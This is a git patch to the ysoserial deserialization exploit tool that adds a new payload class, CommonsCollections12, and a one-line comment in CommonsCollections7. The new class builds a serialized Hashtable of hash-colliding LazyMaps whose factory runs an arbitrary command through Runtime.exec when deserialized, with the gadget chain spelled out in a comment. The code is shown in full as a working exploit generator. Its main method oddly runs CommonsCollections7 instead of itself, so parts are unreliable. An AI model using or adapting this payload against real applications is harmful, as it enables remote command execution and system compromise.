From c6727657f7cf37030984fd8f9870aa65c3acc0a9 Mon Sep 17 00:00:00 2001 From: rootphantomer Date: Thu, 20 Oct 2022 10:51:02 +0800 Subject: [PATCH] =?UTF-8?q?CommonsCollections7=20done=EF=BC=8Cadd=20Common?= =?UTF-8?q?sCollections12?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../payloads/CommonsCollections12.java | 88 +++++++++++++++++++ .../payloads/CommonsCollections7.java | 1 + 2 files changed, 89 insertions(+) create mode 100644 src/main/java/ysoserial/payloads/CommonsCollections12.java diff --git a/src/main/java/ysoserial/payloads/CommonsCollections12.java b/src/main/java/ysoserial/payloads/CommonsCollections12.java new file mode 100644 index 00000000..7af6c548 --- /dev/null +++ b/src/main/java/ysoserial/payloads/CommonsCollections12.java @@ -0,0 +1,88 @@ +package ysoserial.payloads; + +import org.apache.commons.collections.Factory; +import org.apache.commons.collections.map.LazyMap; +import ysoserial.payloads.annotation.Authors; +import ysoserial.payloads.annotation.Dependencies; +import ysoserial.payloads.util.PayloadRunner; + +import java.io.IOException; +import java.io.Serializable; +import java.util.HashMap; +import java.util.Hashtable; +import java.util.Map; + +/* + Payload method chain: + + java.util.Hashtable.readObject + java.util.Hashtable.reconstitutionPut + org.apache.commons.collections.map.AbstractMapDecorator.equals + java.util.AbstractMap.equals + org.apache.commons.collections.map.LazyMap.get + NewFactory.create + java.lang.Runtime.exec +*/ + +@SuppressWarnings({"rawtypes", "unchecked"}) +@Dependencies({"commons-collections:commons-collections:3.1"}) +@Authors({Authors.SCRISTALLI, Authors.HANYRAX, Authors.EDOARDOVIGNATI}) + +public class CommonsCollections12 extends PayloadRunner implements ObjectPayload { + + public Hashtable getObject(final String command) throws Exception { + + // Reusing transformer chain and LazyMap gadgets from previous payloads + final String[] execArgs = new String[]{command}; + + + Map innerMap1 = new HashMap(); + Map innerMap2 = new HashMap(); + + // Creating two LazyMaps with colliding hashes, in order to force element comparison during readObject + NewFactory newFactory = new NewFactory(execArgs); + + Map lazyMap1 = LazyMap.decorate(innerMap1, newFactory); + lazyMap1.put("yy", 1); + + Map lazyMap2 = LazyMap.decorate(innerMap2, newFactory); + lazyMap2.put("zZ", 1); + + // Use the colliding Maps as keys in Hashtable + Hashtable hashtable = new Hashtable(); + hashtable.put(lazyMap1, 1); + hashtable.put(lazyMap2, 2); + + + // Needed to ensure hash collision after previous manipulations + lazyMap2.remove("yy"); + + return hashtable; + } + + public static void main(final String[] args) throws Exception { + PayloadRunner.run(CommonsCollections7.class, args); + } + + static class NewFactory implements Serializable, Factory { + + private final String[] execArgs; + + public NewFactory(final String[] execArgs) { + this.execArgs = execArgs; + } + + @Override + public Object create() { +// exploit + try { + if (this.execArgs != null) { + Runtime.getRuntime().exec(this.execArgs); + } + } catch (IOException e) { + throw new RuntimeException(e); + } + return null; + } + } +} diff --git a/src/main/java/ysoserial/payloads/CommonsCollections7.java b/src/main/java/ysoserial/payloads/CommonsCollections7.java index dd1cd689..97072a7d 100644 --- a/src/main/java/ysoserial/payloads/CommonsCollections7.java +++ b/src/main/java/ysoserial/payloads/CommonsCollections7.java @@ -39,6 +39,7 @@ public class CommonsCollections7 extends PayloadRunner implements ObjectPayload { public Hashtable getObject(final String command) throws Exception { +// transformerChain 改写成factory,详见CC12 // Reusing transformer chain and LazyMap gadgets from previous payloads final String[] execArgs = new String[]{command};